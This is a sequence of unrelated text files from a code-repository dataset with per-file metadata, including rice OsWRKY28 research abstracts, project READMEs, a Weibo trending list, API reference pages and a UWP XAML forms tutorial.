+ In this study, we comprehensively analyzed the role of one of the group IIa WRKY transcription factors in rice, OsWRKY28, in the regulation of basal defense responses to a compatible race of the rice blast fungus Magnaporthe oryzae, strain Ina86-137
+ Finally, transcriptome analysis revealed that the induction of several defense-related genes in the wild type after Ina86-137 infection was counteracted in OsWRKY28-overexpressing rice plants
+ These results strongly suggest that OsWRKY28 is a negative regulator of basal defense responses against Ina86-137 and acts as a modulator to maintain the responses at an appropriate level by attenuating the activation of defense-related gene expression levels
+ The expression analyses of the group IIa WRKY transcription factors in rice revealed that OsWRKY28, together with OsWRKY71, exhibit an early-induced expression prior to the late-induced expressions of OsWRKY62 and OsWRKY76
+ Here, we report that a large inverted repeat construct designed to knock down the expression of the four OsWRKY IIa subfamily members (OsWRKY62, OsWRKY28, OsWRKY71, and OsWRKY76) leads to overexpression of all four genes and disease resistance in some transgenic plants
+ OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus
+ OsWRKY28 Regulates Phosphate and Arsenate Accumulation, Root System Architecture and Fertility in Rice.
+ Exogenous JA treatments mimicked the phenotypes of the oswrky28 mutants with inhibited root elongation and decreased arsenate/phosphate translocation
+ Our results suggested that OsWRKY28 affected arsenate/phosphate accumulation, root development at the seedling stage and fertility at the reproductive stage possibly by influencing homeostasis of JA or other phytohormones
+ The expression of OsWRKY28 was markedly induced by arsenate and other oxidative stresses
+ In a hydroponic experiment, loss-of-function mutation in OsWRKY28 resulted in lower accumulation of arsenate and phosphate concentration in the shoots
* **Connection**
+ __OsWRKY28__, __OsWRKY71__, [OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus%5BTitle%5D), The expression analyses of the group IIa WRKY transcription factors in rice revealed that OsWRKY28, together with OsWRKY71, exhibit an early-induced expression prior to the late-induced expressions of OsWRKY62 and OsWRKY76
+ __OsWRKY28__, __OsWRKY62__, [OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus%5BTitle%5D), The expression analyses of the group IIa WRKY transcription factors in rice revealed that OsWRKY28, together with OsWRKY71, exhibit an early-induced expression prior to the late-induced expressions of OsWRKY62 and OsWRKY76
+ __OsWRKY28__, __OsWRKY76__, [OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus%5BTitle%5D), The expression analyses of the group IIa WRKY transcription factors in rice revealed that OsWRKY28, together with OsWRKY71, exhibit an early-induced expression prior to the late-induced expressions of OsWRKY62 and OsWRKY76
[//]: # * **Key figures**
| 127.530612 | 557 | 0.795167 | eng_Latn | 0.95476 |
9a4f51662540a574e18c6fb33ced040e25b4bdd9 | 115 | md | Markdown | README.md | nyuriumuri/Projects | 15cc71de60f1ec3812ae1ee952dc95adb9f2c96e | [
"MIT"
] | null | null | null | README.md | nyuriumuri/Projects | 15cc71de60f1ec3812ae1ee952dc95adb9f2c96e | [
"MIT"
] | null | null | null | README.md | nyuriumuri/Projects | 15cc71de60f1ec3812ae1ee952dc95adb9f2c96e | [
"MIT"
] | null | null | null | This repository contains the files used in my portofolio [website](https://nyuriumuri.github.io/Projects/archive).
| 57.5 | 114 | 0.808696 | eng_Latn | 0.833074 |
9a4fb844a450e977d4493ed176fb56c6156510c9 | 165 | md | Markdown | submissions/sovrin/Self_Certification_Credential.md | dhh1128/ctwg | 4a020f1347d124f8b7d4a3886c9732e09f26777a | [
"CC-BY-4.0"
] | 2 | 2020-06-02T13:16:15.000Z | 2021-03-24T12:44:57.000Z | submissions/sovrin/Self_Certification_Credential.md | trustoverip/concepts-and-terminology-wg | d9c7566e784da17d9fcb76258511e208a3480639 | [
"CC-BY-4.0"
] | 44 | 2020-05-29T07:46:55.000Z | 2021-08-07T13:52:47.000Z | submissions/sovrin/Self_Certification_Credential.md | dhh1128/ctwg | 4a020f1347d124f8b7d4a3886c9732e09f26777a | [
"CC-BY-4.0"
] | 2 | 2020-05-29T10:09:39.000Z | 2020-10-20T10:24:03.000Z | ## Term/Phrase
Self-Certification Credential
## Definition
A Credential that asserts Self-Certification.
## Relevant Communities
* Sovrin
## Tags
```
#sovrin
```
| 11.785714 | 45 | 0.733333 | eng_Latn | 0.497687 |
9a516ac47526cc7f256006f7186f4fb4eeeb48e4 | 725 | md | Markdown | README.md | UnrealCraic/UE4_Cpp_MultiFirstPersonBase | 0b071ab1207bce5c2d98f88ef4fa4360d79c659c | [
"MIT"
] | null | null | null | README.md | UnrealCraic/UE4_Cpp_MultiFirstPersonBase | 0b071ab1207bce5c2d98f88ef4fa4360d79c659c | [
"MIT"
] | null | null | null | README.md | UnrealCraic/UE4_Cpp_MultiFirstPersonBase | 0b071ab1207bce5c2d98f88ef4fa4360d79c659c | [
"MIT"
] | null | null | null | # UE4_Cpp_MultiFirstPersonBase
Every time I start a new game idea which is first person, requires multiplayer and also requires that other players have a 3rd person representation I spend so long re-doing the initial steps for each project then I get bored. This project is a way to have a starting point with the basics done to allow quicker prototyping of any such game projects
Steps covered:
Create base third person c++ template
Add first person mesh and animations from first person template
Base game flow to enable remote multiplayer sessions
Managing using different meshes/animations depending on locale of player
Intended use:
Create a project using this as a template and get straight to prototyping!
| 60.416667 | 349 | 0.811034 | eng_Latn | 0.999696 |
9a5170397874ced00f4c6cae3fe31649ec66f5dc | 1,452 | md | Markdown | 2020/09/02/2020-09-02 09:30.md | zhzhzhy/WeiBoHot_history | 32ce4800e63f26384abb17d43e308452c537c902 | [
"MIT"
] | 3 | 2020-07-14T14:54:15.000Z | 2020-08-21T06:48:24.000Z | 2020/09/02/2020-09-02 09:30.md | zhzhzhy/WeiBoHot_history | 32ce4800e63f26384abb17d43e308452c537c902 | [
"MIT"
] | null | null | null | 2020/09/02/2020-09-02 09:30.md | zhzhzhy/WeiBoHot_history | 32ce4800e63f26384abb17d43e308452c537c902 | [
"MIT"
] | null | null | null | 2020年09月02日09时数据
Status: 200
1.iPhone12 Pro玻璃后壳曝光
微博热度:3580672
2.王毅点名警告捷克参议长你过线了
微博热度:1574220
3.秦昊学会精打细算了
微博热度:1556782
4.王俊凯刘昊然胡先煦同游迪士尼
微博热度:1487028
5.周扬青安崎同框
微博热度:1467409
6.嵩县
微博热度:1326242
7.美国称不加入与世卫有关的疫苗开发
微博热度:998816
8.嵩县警方通报男子当街打死前女友
微博热度:538518
9.新疆宣布全面恢复正常生产生活秩序
微博热度:505780
10.领走5岁女童嫌犯涉嫌强奸被刑拘
微博热度:429721
11.抗战胜利75周年
微博热度:422927
12.被陈婷气死
微博热度:374525
13.武汉一小学请抗疫英雄家长上第一课
微博热度:363152
14.黄老板得女
微博热度:308205
15.42克金手镯洗完只剩20克
微博热度:260364
16.肖战
微博热度:249552
17.入狱4年手机被经办民警私用
微博热度:247801
18.西藏军区某旅跨昼夜协同打击演练
微博热度:247358
19.TCL大股东误操作卖出500万股
微博热度:244745
20.江南百景图
微博热度:241780
21.央视Boys合唱少年中国说
微博热度:239556
22.一颗高楼大小行星将飞过地球
微博热度:238122
23.李尖尖怼人
微博热度:236766
24.贺梅没有再婚生子
微博热度:210344
25.7岁男孩泳池排便被索赔1万5
微博热度:194751
26.猫咪通宵等主人电话
微博热度:172505
27.章子怡夸Angelababy演技
微博热度:169667
28.英伟达RTX30系列显卡
微博热度:158143
29.女校长当面吃光学生剩饭
微博热度:137847
30.3分钟混剪抗战史
微博热度:137498
31.李尖尖贺子秋给凌霄过生日
微博热度:127433
32.sp姑获鸟
微博热度:122687
33.故宫雨后现天空之镜
微博热度:114468
34.漫威群星悼念黑豹男主
微博热度:106361
35.璇玑被逼发毒誓
微博热度:102338
36.Netflix拍剧版三体
微博热度:101486
37.离人心上
微博热度:94809
38.企业领导每天鞠躬迎送员工
微博热度:91410
39.当你开学有自我介绍时
微博热度:88198
40.悲伤它追上我了
微博热度:86106
41.兼职赚150元后倒欠税款11万
微博热度:85660
42.谭松韵母亲车祸案肇事者父亲回应
微博热度:82724
43.全猪宴
微博热度:79406
44.TCL大股东李东生致歉
微博热度:78498
45.开学第一课
微博热度:78323
46.济南泉底星空隧道通车
微博热度:75782
47.东京8月187人死于中暑
微博热度:74049
48.张定宇微笑讲述自己的渐冻症
微博热度:73714
49.华春莹称美国是真正的云窃密江湖大盗
微博热度:70038
50.外交部回应美大学驱逐我公费留学生
微博热度:69096
| 7.117647 | 20 | 0.789256 | yue_Hant | 0.402125 |
9a523dd11c0b7f58c6914de0a5e797b3cefa5c6a | 296 | md | Markdown | docs/commands/get-hash.md | moderntribe/tec-utils | 3904fb097d6ee89ab6cf98506fa2ead92a05295c | [
"MIT"
] | 1 | 2021-01-02T14:21:21.000Z | 2021-01-02T14:21:21.000Z | docs/commands/get-hash.md | moderntribe/tec-utils | 3904fb097d6ee89ab6cf98506fa2ead92a05295c | [
"MIT"
] | 2 | 2021-05-02T17:13:08.000Z | 2021-05-18T04:12:40.000Z | docs/commands/get-hash.md | moderntribe/tec-utils | 3904fb097d6ee89ab6cf98506fa2ead92a05295c | [
"MIT"
] | null | null | null | # `tut get-hash`
**Gets current repo hash**
Grabs the current short hash of whatever repo you are currently in.
## Usage
```bash
tut get-hash
```
## Args
```
Usage:
get-hash
Options:
-h, --help Display this help message
Help:
Gets the currently checked out git hash
```
| 11.384615 | 67 | 0.641892 | eng_Latn | 0.969802 |
9a52fddda186da0f2753770875c702b1963460b1 | 555 | md | Markdown | README.md | frsong/pyrl | 246a1cf2dc48d6173f8a306f26858f44134c3462 | [
"MIT"
] | 6 | 2016-12-09T15:03:46.000Z | 2021-06-28T10:58:13.000Z | README.md | frsong/pyrl | 246a1cf2dc48d6173f8a306f26858f44134c3462 | [
"MIT"
] | null | null | null | README.md | frsong/pyrl | 246a1cf2dc48d6173f8a306f26858f44134c3462 | [
"MIT"
] | 10 | 2016-08-05T14:54:39.000Z | 2021-01-04T00:21:24.000Z | # Reward-based training of RNNs
## Requirements
This code is written in Python 2.7 and requires
* [Theano 0.8.2](http://deeplearning.net/software/theano/)
## Notes
* For the paper, we used a time step of 10 ms, which results in hundreds of time steps for typical tasks. When training a new task, we highly recommend that you start with a larger value to save time.
## License
MIT
## Citation
* Song, H. F., Yang, G. R., & Wang, X.-J. (2017) Reward-based training of recurrent neural networks for cognitive and value-based tasks. eLife, in press.
| 27.75 | 200 | 0.726126 | eng_Latn | 0.99701 |
9a531ff0d247b666b0f47574bd3a7584e41d5a76 | 1,162 | md | Markdown | articles/Spring18/dynamics365-talent/attract/gauge-public-preview.md | MicrosoftDocs/sandbox-bus-app-relnote | 4f79372e30f76e48c5516a5c587708135c0651d0 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2018-05-02T13:05:57.000Z | 2020-05-19T20:15:24.000Z | articles/Spring18/dynamics365-talent/attract/gauge-public-preview.md | MicrosoftDocs/sandbox-bus-app-relnote | 4f79372e30f76e48c5516a5c587708135c0651d0 | [
"CC-BY-4.0",
"MIT"
] | 24 | 2018-04-13T18:37:52.000Z | 2021-11-25T06:03:29.000Z | articles/Spring18/dynamics365-talent/attract/gauge-public-preview.md | MicrosoftDocs/sandbox-bus-app-relnote | 4f79372e30f76e48c5516a5c587708135c0651d0 | [
"CC-BY-4.0",
"MIT"
] | 9 | 2018-04-30T20:49:56.000Z | 2021-11-15T11:12:48.000Z | ---
title: Gauge Public Preview
description: Gauge lets hiring managers or recruiters create questionnaires and send them to candidates as part of an assessment activity.
author: MargoC
manager: AnnBe
ms.date: 05/01/2018
ms.assetid: 6189f2a5-3778-497d-acd4-62fa6bb132fa
ms.topic: article
ms.prod:
ms.service: business-applications
ms.technology:
ms.author: margoc
audience: Admin
---
# Gauge (Public Preview)
[!include[banner](../../../includes/banner.md)]
Gauge lets hiring managers or recruiters create questionnaires and send them to
candidates as part of an assessment activity. Candidates are informed in their
candidate app that a new task is waiting for them. They can easily navigate to
the questionnaire and complete the assessment. The hiring manager and recruiter
can track the process and results directly in Attract.

<!-- Talent_Assessment activities_A.png -->
*Gauge integration*
| 35.212121 | 254 | 0.79432 | eng_Latn | 0.981603 |
9a541b1a17b4b2384749506f506f498ee334e1e5 | 978 | md | Markdown | _posts/unity/editor_utilities/2021-09-01-unity-editor-timescale-slider.md | rito15/Rito15.github.io | 1da1d7852aee3b31da194309aa21d3531ae8d872 | [
"MIT"
] | null | null | null | _posts/unity/editor_utilities/2021-09-01-unity-editor-timescale-slider.md | rito15/Rito15.github.io | 1da1d7852aee3b31da194309aa21d3531ae8d872 | [
"MIT"
] | null | null | null | _posts/unity/editor_utilities/2021-09-01-unity-editor-timescale-slider.md | rito15/Rito15.github.io | 1da1d7852aee3b31da194309aa21d3531ae8d872 | [
"MIT"
] | 5 | 2021-07-23T08:47:44.000Z | 2021-12-29T11:24:39.000Z | ---
title: Timescale Slider(게임 진행 속도 조절 슬라이더)
author: Rito15
date: 2021-09-01 16:00:00 +09:00
categories: [Unity, Unity Editor Utilities]
tags: [unity, editor, csharp, utility]
math: true
mermaid: true
---
# Summary
---
- 게임 진행 속도를 `0%` ~ `100%` 사이에서 조절할 수 있는 슬라이더를 유니티 에디터 상단 재생 버튼 우측에 생성합니다.
- 유니티 에디터 내에서만 동작하고, 빌드 이후에는 아무런 영향을 미치지 않습니다.
<br>
## 테스트 완료 에디터 버전
- 2018.3.14f1
- 2019.4.9f1
- 2020.3.14f1
- 2020.3.17f1
<br>
## Note
- 2020.3.17f1 버전까지만 정상 작동합니다.
<br>
# Preview
---


<br>
# Download
---
- [Timescale Slider.unitypackage](https://github.com/rito15/Unity-Useful-Editor-Assets/releases/download/1.04/Timescale-Slider.unitypackage)
<br>
# References
---
- <https://github.com/marijnz/unity-toolbar-extender> | 18.807692 | 140 | 0.716769 | kor_Hang | 0.931905 |
9a5491031d461dd35f75e1f5a1523cb4a8fa249f | 1,634 | md | Markdown | docs/reference/toloka.client.TolokaClient.get_skills.md | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 153 | 2021-02-06T13:41:11.000Z | 2022-03-19T17:51:01.000Z | docs/reference/toloka.client.TolokaClient.get_skills.md | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 29 | 2021-01-15T12:54:37.000Z | 2022-02-07T07:45:32.000Z | docs/reference/toloka.client.TolokaClient.get_skills.md | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 17 | 2021-01-29T15:20:04.000Z | 2022-01-30T07:21:03.000Z | # get_skills
`toloka.client.TolokaClient.get_skills`
Finds all skills that match certain rules and returns them in an iterable object
Unlike find_skills, returns generator. Does not sort skills.
While iterating over the result, several requests to the Toloka server is possible.
## Parameters Description
| Parameters | Type | Description |
| :----------| :----| :-----------|
`name`|**Optional\[str\]**|<p>Skill name.</p>
`id_lt`|**Optional\[str\]**|<p>Skills with an ID less than the specified value.</p>
`id_lte`|**Optional\[str\]**|<p>Skills with an ID less than or equal to the specified value.</p>
`id_gt`|**Optional\[str\]**|<p>Skills with an ID greater than the specified value.</p>
`id_gte`|**Optional\[str\]**|<p>Skills with an ID greater than or equal to the specified value.</p>
`created_lt`|**Optional\[datetime\]**|<p>Skills created before the specified date.</p>
`created_lte`|**Optional\[datetime\]**|<p>Skills created before or on the specified date.</p>
`created_gt`|**Optional\[datetime\]**|<p>Skills created after the specified date.</p>
`created_gte`|**Optional\[datetime\]**|<p>Skills created on or after the specified date.</p>
* **Yields:**
The next object corresponding to the request parameters.
* **Yield type:**
Generator\[[Skill](toloka.client.skill.Skill.md), None, None\]
**Examples:**
How to check that a skill exists.
```python
segmentation_skill = next(toloka_client.get_skills(name='Area selection of road signs'), None)
if segmentation_skill:
print(f'Segmentation skill already exists, with id {segmentation_skill.id}')
else:
print('Create new segmentation skill here')
```
| 38 | 99 | 0.71175 | eng_Latn | 0.967701 |
9a5514c4e1bb2b709058c4894a3a6b3b917cb1fa | 13,593 | md | Markdown | windows-apps-src/get-started/construct-form-learning-track.md | danmoseley/windows-uwp | d7783efb1c60b81e94898294fc5794c1d3320004 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-06-29T12:07:42.000Z | 2021-06-29T12:07:42.000Z | windows-apps-src/get-started/construct-form-learning-track.md | danmoseley/windows-uwp | d7783efb1c60b81e94898294fc5794c1d3320004 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-05-02T05:11:43.000Z | 2021-05-02T05:11:43.000Z | windows-apps-src/get-started/construct-form-learning-track.md | danmoseley/windows-uwp | d7783efb1c60b81e94898294fc5794c1d3320004 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Learning track - Construct and configure a form
description: Learn how to construct and configure a robust form in a Universal Windows Platform (UWP) app for handling the input of a significant amount of information.
ms.date: 03/17/2021
ms.topic: article
keywords: get started, uwp, windows 10, learning track, layout, form
ms.localizationpriority: medium
ms.custom: RS5
---
# Create and customize a form
If you're creating an app that requires users to input a significant amount of information, chances are you'll want to create a form for them to fill out. This article will show you what you need to know in order to create a form that is useful and robust.
This is not a tutorial. If you want one, see our [adaptive layout tutorial](../design/basics/xaml-basics-adaptive-layout.md), which will provide you with a step-by-step guided experience.
We'll discuss what **XAML controls** go into a form, how to best arrange them on your page, and how to optimize your form for changing screen sizes. But because a form is about the relative position of visual elements, let's first discuss page layout with XAML.
## What do you need to know?
UWP does not have an explicit form control that you can add to your app and configure. Instead, you'll need to create a form by arranging a collection of UI elements on a page.
To do so, you'll need to understand **layout panels**. These are containers that hold your app's UI elements, allowing you to arrange and group them. Placing layout panels within other layout panels gives you a great deal of control over where and how your items display in relation to one another. This also makes it far easier to adapt your app to changing screen sizes.
Read [this documentation on layout panels](../design/layout/layout-panels.md). Because forms are usually displayed in one or more vertical columns, you'll want to group similar items in a **StackPanel**, and arrange those within a **RelativePanel** if you need to. Start putting together some panels now — if you need a reference, below is a basic layout framework for a two-column form:
```xaml
<RelativePanel>
<StackPanel x:Name="Customer" Margin="20">
<!--Content-->
</StackPanel>
<StackPanel x:Name="Associate" Margin="20" RelativePanel.RightOf="Customer">
<!--Content-->
</StackPanel>
<StackPanel x:Name="Save" Orientation="Horizontal" RelativePanel.Below="Customer">
<!--Save and Cancel buttons-->
</StackPanel>
</RelativePanel>
```
## What goes in a form?
You'll need to fill your form with an assortment of [XAML Controls](../design/controls-and-patterns/controls-and-events-intro.md). You're probably familiar with those, but feel free to read up if you need a refresher. In particular, you'll want controls that allow your user to input text or choose from a list of values. This is a basic list of options you could add – you don't need to read everything about them, just enough so you understand what they look like and how they work.
* [TextBox](../design/controls-and-patterns/text-box.md) lets a user input text into your app.
* [ToggleSwitch](../design/controls-and-patterns/toggles.md) lets a user choose between two options.
* [DatePicker](../design/controls-and-patterns/date-picker.md) lets a user select a date value.
* [TimePicker](../design/controls-and-patterns/time-picker.md) lets a user select a time value.
* [ComboBox](/uwp/api/Windows.UI.Xaml.Controls.ComboBox) expand to display a list of selectable items. You can learn more about them [here](../design/controls-and-patterns/combo-box.md)
You also might want to add [buttons](../design/controls-and-patterns/buttons.md), so the user can save or cancel.
## Format controls in your layout
You know how to arrange layout panels and have items you'd like to add, but how should they be formatted? The [forms](../design/controls-and-patterns/forms.md) page has some specific design guidance. Read through the sections on **Types of forms** and **layout** for useful advice. We'll discuss accessibility and relative layout more shortly.
With that advice in mind, you should start adding your controls of choice into your layout, being sure they're given labels and spaced properly. As an example, here's the bare-bones outline for a single-page form using the above layout, controls, and design guidance:
```xaml
<RelativePanel>
<StackPanel x:Name="Customer" Margin="20">
<TextBox x:Name="CustomerName" Header= "Customer Name" Margin="0,24,0,0" HorizontalAlignment="Left" />
<TextBox x:Name="Address" Header="Address" PlaceholderText="Address" Margin="0,24,0,0" HorizontalAlignment="Left" />
<TextBox x:Name="Address2" Margin="0,24,0,0" PlaceholderText="Address 2" HorizontalAlignment="Left" />
<RelativePanel>
<TextBox x:Name="City" PlaceholderText="City" Margin="0,24,0,0" HorizontalAlignment="Left" />
<ComboBox x:Name="State" PlaceholderText="State" Margin="24,24,0,0" RelativePanel.RightOf="City">
<!--List of valid states-->
</ComboBox>
</RelativePanel>
</StackPanel>
<StackPanel x:Name="Associate" Margin="20" RelativePanel.Below="Customer">
<TextBox x:Name="AssociateName" Header= "Associate" Margin="0,24,0,0" HorizontalAlignment="Left" />
<DatePicker x:Name="TargetInstallDate" Header="Target install Date" HorizontalAlignment="Left" Margin="0,24,0,0"></DatePicker>
<TimePicker x:Name="InstallTime" Header="Install Time" HorizontalAlignment="Left" Margin="0,24,0,0"></TimePicker>
</StackPanel>
<StackPanel x:Name="Save" Orientation="Horizontal" RelativePanel.Below="Associate">
<Button Content="Save" Margin="24" />
<Button Content="Cancel" Margin="24" />
</StackPanel>
</RelativePanel>
```
Feel free to customize your controls with more properties for a better visual experience.
## Make your layout responsive
Users might view your UI on a variety of devices with different screen widths. To ensure that they have a good experience regardless of their screen, you should use [responsive design](../design/layout/responsive-design.md). Read through that page for good advice on the design philosophies to keep in mind as you proceed.
The [Responsive layouts with XAML](../design/layout/layouts-with-xaml.md) page gives a detailed overview of how to implement this. For now, we'll focus on **fluid layouts** and **visual states in XAML**.
The basic form outline that we've put together is already a **fluid layout**, as it's depending mostly on the relative position of controls with only minimal use of specific pixel sizes and positions. Keep this guidance in mind for more UIs you might create in the future, though.
More important to responsive layouts are **visual states.** A visual state defines property values that are applied to a given element when a given condition is true. [Read up on how to do this in xaml](../design/layout/layouts-with-xaml.md#set-visual-states-in-xaml-markup), and then implement them into your form. Here's what a *very* basic one might look like in our previous sample:
```xaml
<Page ...>
<Grid>
<VisualStateManager.VisualStateGroups>
<VisualStateGroup>
<VisualState>
<VisualState.StateTriggers>
<AdaptiveTrigger MinWindowWidth="640" />
</VisualState.StateTriggers>
<VisualState.Setters>
<Setter Target="Associate.(RelativePanel.RightOf)" Value="Customer"/>
<Setter Target="Associate.(RelativePanel.Below)" Value=""/>
<Setter Target="Save.(RelativePanel.Below)" Value="Customer"/>
</VisualState.Setters>
</VisualState>
</VisualStateGroup>
</VisualStateManager.VisualStateGroups>
<RelativePanel>
<!-- Customer StackPanel -->
<!-- Associate StackPanel -->
<!-- Save StackPanel -->
</RelativePanel>
</Grid>
</Page>
```
> [!IMPORTANT]
> When you use StateTriggers, always ensure that VisualStateGroups is attached to the first child of the root. Here, **Grid** is the first child of the root **Page** element.
It's not practical to create visual states for a wide array of screen sizes, nor are more than a couple likely to have significant impact on the user experience of your app. We recommend designing instead for a few key breakpoints - you can [read more here](../design/layout/screen-sizes-and-breakpoints-for-responsive-design.md).
## Add accessibility support
Now that you have a well-constructed layout that responds to changes in screen sizes, a last thing you can do to improve the user experience is to [make your app accessible](../design/accessibility/accessibility-overview.md). There's a lot that can go into this, but in a form like this one it's easier than it looks. Focus on the following:
* Keyboard support - ensure the order of elements in your UI panels match how they're displayed on screen, so a user can easily tab through them.
* Screen reader support - ensure all your controls have a descriptive name.
When you're creating more complex layouts with more visual elements, you'll want to consult the [accessibility checklist](../design/accessibility/accessibility-checklist.md) for more details. After all, while accessibility isn't necessary for an app, it helps it reach and engage a larger audience.
## Going further
Though you've created a form here, the concepts of layouts and controls are applicable across all XAML UIs you might construct. Feel free to go back through the docs we've linked you to and experiment with the form you have, adding new UI features and further refining the user experience. If you want step-by-step guidance through more detailed layout features, see our [adaptive layout tutorial](../design/basics/xaml-basics-adaptive-layout.md)
Forms also don't have to exist in a vacuum - you could go one step further and embed yours within a [list/details pattern](../design/controls-and-patterns/list-details.md) or a [NavigationView](../design/controls-and-patterns/navigationview.md). Or if you want to get to work on the code-behind for your form, you might want to get started with our [events overview](../xaml-platform/events-and-routed-events-overview.md).
## Useful APIs and docs
Here's a quick summary of APIs and other useful documentation to help you get started working with Data Binding.
### Useful APIs
| API | Description |
|------|---------------|
| [Controls useful for forms](../design/controls-and-patterns/forms.md#input-controls) | A list of useful input controls for creating forms, and basic guidance of where to use them. |
| [Grid](/uwp/api/Windows.UI.Xaml.Controls.Grid) | A panel for arranging elements in multi-row and multi-column layouts. |
| [RelativePanel](/uwp/api/Windows.UI.Xaml.Controls.RelativePanel) | A panel for arranging items in relation to other elements and to the panel's boundaries. |
| [StackPanel](/uwp/api/Windows.UI.Xaml.Controls.StackPanel) | A panel for arranging elements into a single horizontal or vertical line. |
| [VisualState](/uwp/api/Windows.UI.Xaml.VisualState) | Allows you to set the appearance of UI elements when they're in particular states. |
### Useful docs
| Topic | Description |
|-------|----------------|
| [Accessibility overview](../design/accessibility/accessibility-overview.md) | A broad-scale overview of accessibility options in apps. |
| [Accessibility checklist](../design/accessibility/accessibility-checklist.md) | A practical checklist to ensure your app meets accessibility standards. |
| [Events overview](../xaml-platform/events-and-routed-events-overview.md) | Details on adding and structuring events to handle UI actions. |
| [Forms](../design/controls-and-patterns/forms.md) | Overall guidance for creating forms. |
| [Layout panels](../design/layout/layout-panels.md) | Provides an overview of the types of layout panels and where to use them. |
| [List/details pattern](../design/controls-and-patterns/list-details.md) | A design pattern that can be implemented around one or multiple forms. |
| [NavigationView](../design/controls-and-patterns/navigationview.md) | A control that can contain one or multiple forms. |
| [Responsive design](../design/layout/responsive-design.md) | An overview of large-scale responsive design principles. |
| [Responsive layouts with XAML](../design/layout/layouts-with-xaml.md) | Specific information on visual states and other implementations of responsive design. |
| [Screen sizes for responsive design](../design/layout/screen-sizes-and-breakpoints-for-responsive-design.md) | Guidance on which screen sizes to which responsive layouts should be scoped. |
## Useful code samples
| Code sample | Description |
|-----------------|---------------|
| [Adaptive layout tutorial](../design/basics/xaml-basics-adaptive-layout.md) | A step-by-step guided experience through adaptive layouts and responsive design. |
| [Customer Orders Database](https://github.com/Microsoft/Windows-appsample-customers-orders-database) | See layout and forms in action on a multi-page enterprise sample. |
| [XAML Controls Gallery](https://github.com/Microsoft/Xaml-Controls-Gallery) | See a selection of XAML controls, and how they're implemented. |
| [Additional code samples](https://developer.microsoft.com/windows/samples) | Choose **Controls, layout, and text** in the category drop-down list to see related code samples. | | 75.938547 | 484 | 0.733907 | eng_Latn | 0.980834 |
9a552bb847fcbe9e0f2e48cfdc4acbb16506c03e | 35 | md | Markdown | README.md | petertiupe/erna | 033ed838c3b1662a8f7a2bbdf9bd4585373a218e | [
"MIT"
] | null | null | null | README.md | petertiupe/erna | 033ed838c3b1662a8f7a2bbdf9bd4585373a218e | [
"MIT"
] | null | null | null | README.md | petertiupe/erna | 033ed838c3b1662a8f7a2bbdf9bd4585373a218e | [
"MIT"
] | null | null | null | # erna
My first trials with fritz2
| 11.666667 | 27 | 0.771429 | eng_Latn | 0.999936 |
9a5644311e0803b8578748802ead8d6cd38792ed | 1,014 | md | Markdown | AlchemyInsights/update-dns-records-at-namecheap.md | 47-studio-org/OfficeDocs-AlchemyInsights-pr.de-DE | edb8893aa6f88fe3c40b9a0a3ad2396b02bebb54 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2022-03-15T16:17:10.000Z | 2022-03-15T16:17:10.000Z | AlchemyInsights/update-dns-records-at-namecheap.md | MarcelRaschke/OfficeDocs-AlchemyInsights-pr.de-DE | edb8893aa6f88fe3c40b9a0a3ad2396b02bebb54 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | AlchemyInsights/update-dns-records-at-namecheap.md | MarcelRaschke/OfficeDocs-AlchemyInsights-pr.de-DE | edb8893aa6f88fe3c40b9a0a3ad2396b02bebb54 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-03-08T00:39:46.000Z | 2021-03-08T00:39:46.000Z | ---
title: Aktualisieren von DNS-Einträgen bei NameCheap
ms.author: pebaum
author: pebaum
manager: mnirkhe
ms.audience: Admin
ms.topic: article
ms.service: o365-administration
ROBOTS: NOINDEX, NOFOLLOW
localization_priority: Priority
ms.collection: Adm_O365
ms.custom:
- "100001"
- "5810"
ms.openlocfilehash: f32b9f820fce03cd8cd5d8f8eb509efbc3cdeb2f
ms.sourcegitcommit: c6692ce0fa1358ec3529e59ca0ecdfdea4cdc759
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 09/14/2020
ms.locfileid: "47699554"
---
# <a name="update-dns-records-at-namecheap"></a>Aktualisieren von DNS-Einträgen bei NameCheap
Verwenden Sie die nachstehenden Links zum Aktualisieren Ihrer DNS-Einträge.
- [Erstellen von DNS-Einträgen bei NameCheap](https://docs.microsoft.com/microsoft-365/admin/dns/create-dns-records-at-namecheap?view=o365-worldwide)
- [Hinzufügen oder Bearbeiten von benutzerdefinierten DNS-Einträgen in Office 365](https://docs.microsoft.com/microsoft-365/admin/setup/add-domain#add-or-edit-custom-dns-records) | 37.555556 | 178 | 0.814596 | deu_Latn | 0.460453 |
9a56d4073a4be5c176859dbbae07daa4d9f75d6c | 1,533 | md | Markdown | Heap/791.Merge Number/README.md | Zhenye-Na/LxxxCode | afd79d790d0a7495d75e6650f80adaa99bd0ff07 | [
"MIT"
] | 12 | 2019-05-04T04:21:27.000Z | 2022-03-02T07:06:57.000Z | Heap/791.Merge Number/README.md | Zhenye-Na/LxxxCode | afd79d790d0a7495d75e6650f80adaa99bd0ff07 | [
"MIT"
